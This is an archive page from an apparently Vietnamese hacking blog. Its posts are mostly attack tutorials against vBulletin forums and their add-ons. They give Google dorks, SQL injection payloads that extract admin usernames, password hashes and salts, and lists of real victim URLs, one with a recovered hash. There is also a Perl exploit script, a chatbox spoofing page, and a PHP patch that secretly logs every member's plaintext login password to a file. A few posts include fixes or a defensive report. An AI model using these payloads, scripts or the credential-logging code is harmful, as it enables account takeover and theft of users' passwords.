Home / vBulletin
Hiển thị các bài đăng có nhãn vBulletin. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn vBulletin. Hiển thị tất cả bài đăng

Thứ Hai, 26 tháng 8, 2013

exploit vBulletin với Awards System 4.0.2+ SQL Injection

Tiếp tục exploit vBulletin với Awards System 4.0.2+ SQL Injection
dork thì sáng tạo ra nha
Ở đây mình dùng dork này nè : inurl:request_award.php Powered by vBulletin® Version 4.0.2

vào site victim với dạng victim.com/request_award.php
Khai thác bằng thêm data với cấu trúc như sau ,có thể dùng addon hackbar nha

do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
-->victim.com/request_award.php
Data:do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
Mình lấy ví dụ victim là trang ihabteens.com
kết hợp command và query nó 

http://www.ihabteens.com/forums/request_award.php
Post :do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,sal t,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit


Sẽ hiện ra như sau ,hihi




View source nó và nhận đc là 



--> Dino:ef1b59043951239f1d073772342f119a

login bằng cookie thôi :x 
Pada Komentar

Khai Thác Vbulletin [sql trên shoutbox]

2 bài trứoc viết về vbb,tiếp tục mình viết nốt mấy bug còn lại ,bài này là lỗi sql trên shoutbox
dork khai thác :inurl:infernoshout.php



ra một số trang thêm vào đuôi victim tìm đc đoạn như sau
victim.com/folder/infernoshout.php?do=options&area=commands
Mình demo trên http://bien19.biz/forum/infernoshout...&area=commands
hiện ra như sau



Như thấy nó hiện ra 4 khung,khung đầu nhập vào đoạn query là
PHP Code:
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#  
Khung tiếp theo thích nhập gì thì nhập .

save setting,nó sẽ hiện ra trang thông báo



View source kéo xuống ta xem tên user và đoạn pass mã hóa nó,lấy đăng nhập bằng user admin bằng cookie thôi^^

Pada Komentar

Thứ Sáu, 16 tháng 8, 2013

How To Hack vBulletin 4.1.10 Admin Control Panel

How To Hack vBulletin 4.1.10 Admin Control Panel

vBulletin 4.1.10 Vulnerability description:
When a new name and password is entered in a form and the form is submitted, the browser

asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.

.This vulnerability affects /admincp
.The impact of this vulnerability
.Possible sensitive information disclosure


Now I Will Tell You How To Hack Admin Cp
Mã:
vb_login_password
from form named loginform with
Mã:
action ../login.php?do=login
has autocomplete enabled.

IN That Way You Could Do Sql Injection

Other Vulnerabilty Found Also


The HTML comments of this page contain configuration information for Microsoft Frontpage Server Extensions. The configuration information includes the Frontpage version and may help an attacker to learn more about his target.
This vulnerability affects
Mã:
/_vti_inf.html.
To Attack It
example.com/admincp/_vti_inf.html
Or Use That Way
Mã:
example.com/_vti_inf.html
Pada Komentar

Thứ Năm, 18 tháng 4, 2013

Bug SHOP Guny Cương Hóa Guny

Bug SHOP Guny Cương Hóa Guny

# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
# Exploit Title: SHOP Guny Cương Hóa Guny #
# Google Dork: n/a #


# Date: 16/4/13 #
# Exploit Author: VnDragon - VHB #
# Code Mod: http://www.vietvbb.vn/up/showthread.php?t=67076 #
# Version: [2.0.1] #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #

Code:
Exploit: http://victim.com/tudo.php?tudo=matkieng&id=1' [SQL]
Exploit: http://victim.com/tudo.php?tudo=mat&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=ao&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=toc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=non&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=trangsuc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=canh&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=vukhi&id=1' [SQL]
File: tudo.php, Line: 372 and more fille.
PHP Code:
$id $_GET['id']; 
Fix

Find
PHP Code:
$id $_GET['id']; 
And Replace

PHP Code:
$id addslashes($_GET['id']); 

Demo: http://jrockhome.com/tudo.php?tudo=mat&id=1'

Note: Phải có items mới tiến hành exploit được.
Pada Komentar
(Final 2.1) Hệ thống RPG PET

(Final 2.1) Hệ thống RPG PET

# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
# Exploit Title: (Final 2.1) Hệ thống RPG PET #
# Google Dork: n/a #
# Date: 15/4/13 #
# Exploit Author: VnDragon - VHB #
# Code Mod: http://www.vietvbb.vn/up/showthread.php?t=40921 #
# Version: [2.1] #
# Thank concobe #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
Exploit: http://victim.com/rpg.php?do=battle&type=monster&id=-1' [SQL]
File: battle.php, Line: 11 and more fille.
Code:

PHP Code:
$idmon $_GET['id']; 
Fix

Find
PHP Code:
$idmon $_GET['id']; 
And Replace

PHP Code:
$idmon addslashes($_GET['id']); 


Demo: http://nguyenmy.net/forum/rpg.php?do...=monster&id=-1'
Pada Komentar
Fun Shop mod Vbulletin SQL injection

Fun Shop mod Vbulletin SQL injection


Như đã hứa thì hôm nay mình sẽ cung cấp một cái bug của 1 mod cũng khá nhiều forum đang sử dụng bị dính lỗi SQL injection và có thể bị khai thác và chiếm quyền, dưới đây là thông tin lỗi:

Mod lỗi: Fun Shop
Author: http://www.vietvbb.vn/up/showthread.php?t=43945
version: All
Dork: inurl:/fshop.php?do=buy&id=
link lỗi: /fshop.php?do=buy&id=SQL Injection
Exploit by: concobe & bula -VHB- huynhdegroup.net
Điều kiện bắt buộc phải có là:
1. victim có cài mod Fun Shop
2. Attacker phải có tài khoản trên victim và đã login vào.
Query giả sử id=6: /fshop.php?do=buy&id=-6' union select 1,2,3,4,5,6,7,8,9,10-- -
cột lỗi gồm 5,6,7,8
lấy version() : /fshop.php?do=buy&id=-6' union select 1,2,3,4,version(),6,7,8,9,10-- -
xxx xxx xxx
Đến đây thì có lẽ mọi người hoàn toàn có thể làm những gì mình cần rồi. Mình không ghi ra luôn tất cả những câu query để lấy những thông tin quan trọng mục đích để mọi người tự query và làm phần còn lại để hiểu hơn những gì mình cần làm.
Một số server sẽ có chặn và lọc các truy vấn nguy hiểm nên mọi người có thể dùng thêm những cách bypass khi SQL injection thông thường là sẽ làm được.
Fix lỗi:
Do dạo này đang bận nên chưa đưa ra được bản fix lỗi cho mod này được. Bạn nào có thời gian và điều kiện giúp mình bổ xung phần fix lỗi mod này dùm.
Cuối cùng vui lòng để lại dòng này khi leech đi các nơi khác dùm:Exploit by: concobe & bula -VHB- huynhdegroup.net

---------- Post added at 08:54 PM ---------- Previous post was at 08:49 PM ----------

Live demo: http://teamhacker.us/forum/
sorry Tim Rơi Lệ
Pada Komentar
vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection


vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection



# Exploit Title: vBulletin 5 Beta XX SQLi 0day# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
 
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
 
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;</pre>
<b>&nbsp;</b></div>
Pada Komentar

Thứ Tư, 17 tháng 4, 2013

Thứ Bảy, 3 tháng 11, 2012

Thứ Năm, 25 tháng 10, 2012

Nghịch ChangUonDyU Chatbox[ Dành cho Newbie]


_Lại chào bà con phát nữa,rảnh tiếp làm cái tut cho mấy ku nghịch ( chỉ dành cho mấy master gà ko config chatbox thôi nhá) pro lượn

[+] _Phần 1 ( config mặc định) 


./_ Trước tiên lấy vic tim lên google tìm bừa được thằng Muonline forum.mu4viet.com lấy nó test luôn zô reg cái nick thấy có chát box là thích rồi 

./_ http://forum.mu4viet.com/chatbox/ <- đây là chat box chưa được config và được đặt mặc định như sau
$config['check_domain_reffer'] = false; // <--- Không cho sử dụng domain #
$config['check_chatbox_key'] = false; // <-- Phải có key mới chát được trường hợp này là false với giá trị này thì ta vẫn có thể chát mà ko cần key ( mỗi 1 user có 1 key chát # nhau)

./_ Trong khi chát bật Http live lên để sniff



./_ Và ta có được đoạn code sau


Referer: http://forum.mu4viet.com/chatbox//index.php
?do=postshout
&key=ace24b6eb5855aa4124e5fe85a2a750c
&userid=1
&groupid=6
&username=%3Cfont%20color%3D%27red%27%3E%3Cb%3ETMT %3C%2Fb%3E%3C%2Ffont%3E
&message=%2Fprune
&color=Lime
&font=Arial
&font=
&bold=B*
&italic=I
&underline=U

./_ Với config như trên thì ta không cần dùng đến key vẫn chát có thể chát được , bây giờ ta cài đặt Localhost để bắt đầu nghịch nhé , ở đây mình cài xampp

./_ Để bắt đàu công đoạn thì ta view cái source của diễn đàn lên sẽ thấy như sau



./_ Ở cái đống mã nguồn này ta lợi dụng đoạn JavaScript cõ sẵn , mình ko hướng dẫn chi tiết chỉ cần lấy 1 số đoạn mã cần thiết phục vụ cho việc mình cần làm thôi



<html> <head> <script language="JavaScript" type="text/javascript"> } function fcb_setCookie(c_name,value) { var exdate=new Date(); exdate.setDate(exdate.getDate()+365); document.cookie=c_name+ "=" +escape(value)+ ";expires="+exdate.toGMTString() + "path=/"; } function fcb_getCookie(c_name) { if (document.cookie.length>0) { c_start=document.cookie.indexOf(c_name + "="); if (c_start!=-1) { c_start=c_start + c_name.length+1; c_end=document.cookie.indexOf(";",c_start); if (c_end==-1) c_end=document.cookie.length; return unescape(document.cookie.substring(c_start,c_end)) ; } else { return ""; } } } var path = 'http://forum.mu4viet.com/chatbox/'; var chatboxkey = 'ace24b6eb5855aa4124e5fe85a2a750c'; var huid = '1'; var hgroupid = '6'; var huser = "%3Cb%3E%3Cfont%20color%3Dred%3ETMT%3C%2Fb%3E%3C%2Ffont%3E"; function fcb_postshout()
{
hmess = document.fcb_form.hmess.value;
document.fcb_form.hmess.value = '';
if (hmess == '')
{
alert('Chưa nhập nội dung!');
}
else
{
fcb_frame.location = path + '/index.php?do=postshout&key=' + chatboxkey + '&userid=' + huid + '&groupid=' + hgroupid + '&username=' + huser + '&message=' + encodeURIComponent(hmess) + '&color=Lime&font=Arial&font=&bold=B*&italic=I&und erline=U';
}
}
/script>
</head>
<body bgcolor="#2c2c2c" text="#0F0">
<form name="fcb_form" method="post" action="javascript:fcb_postshout();">
<input id="hmess" type="text" name="hmess" style="width:94%;">
<input type="submit" value="Send">
</form>
<iframe name="fcb_frame" src="http://forum.mu4viet.com/chatbox/index.php" frameborder="0" style="width: 100%; height: 93%"></iframe>
</body>
</html>

./_ Save nó lại thành HTML và gõ thôi  , change cái tên TMT thành tên Của bạn là ok

./_Bên ChátBox

./_Hết phần 1 với mức cơ bản ....Code juno_okyo chym teo

Nguồn http://www.tmt-today.com/2012/10/nghich-changuondyu-chatbox-danh-cho.html
Sẽ cố gắng tự viết ra tut chơi cho ae đọc
Pada Komentar

Thứ Tư, 24 tháng 10, 2012

ChangUonDyU - Advanced Statistics SQL injection

ChangUonDyU - Advanced Statistics SQL injection


010101010101010101010101010101010101010101010101010101010
1 VNHGROUP 0
0 H4cking - S3cure - Und3rGroup 0
010101010101010101010101010101010101010101010101010101010


#####################################################################################################
->Vulnerability
#####################################################################################################
->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,
user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager fake login
[+] Md5 Hash Generator ->http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno-okyo & all VNHgroup members
##########################################################################################
Pada Komentar

Thứ Ba, 23 tháng 10, 2012

[Report] ChangUonDyU Advanced Statistics - SQL injection

[Report] ChangUonDyU Advanced Statistics - SQL injection


Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được


Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là 
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng: 
Trích dẫn
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);


Thay bằng: 
Trích dẫn
$foruminid = intval($_REQUEST['listforumid']);


Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:

Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.
Pada Komentar

Thứ Hai, 15 tháng 10, 2012

Cài Keylogger cho VBB

Cài Keylogger cho VBB


<b>Cái này sẽ ghi lại pass của mọi thành viên khi họ đăng nhập vào 1 file ta định sẵn

-edit file login.php
tìm:
Trích dẫn
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);


thêm vào bên dưới:
Trích dẫn
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
// The log will be recorded in this file
$lg_file = “./modcp/test.html“;

$sql_query = @mysql_query(”SELECT * FROM ” . TABLE_PREFIX . “user WHERE username=’” . $lg_username . “‘”);

while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, “a+”); @fwrite($fp1, $lg_username . ‘ : ‘ . $lg_password.” (” . $row["email"] . “)\n”);
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, “w”);
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}



- Edit file global.php:
Tìm
Trích dẫn
$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates


Thay bằng:
Trích dẫn
//$show['nopasswordempty'] = defined(’DISABLE_PASSWORD_CLEARING’) ? 1 : 0; // this nees to be an int for the templates



- Nếu gặp lỗi các bạn có thể vào file global.php tìm
Trích dẫn

eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);


Và thay thể bằng
Trích dẫn

//eval(’$ad_location[\'ad_header_logo\'] = “‘ . fetch_template(’ad_header_logo’) . ‘”;’);
//eval(’$ad_location[\'ad_header_end\'] = “‘ . fetch_template(’ad_header_end’) . ‘”;’);
//eval(’$ad_location[\'ad_navbar_below\'] = “‘ . fetch_template(’ad_navbar_below’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_start\'] = “‘ . fetch_template(’ad_footer_start’) . ‘”;’);
//eval(’$ad_location[\'ad_footer_end\'] = “‘ . fetch_template(’ad_footer_end’) . ‘”;’);



File chứa Password sẽ được lưu ở đây:
/modcp/test.htm

Nguồn:http://phongdatgl.biz/blog/read.php?88#ixzz29N4xZTpP</b>
Pada Komentar
Đăng ký: Bài đăng (Atom)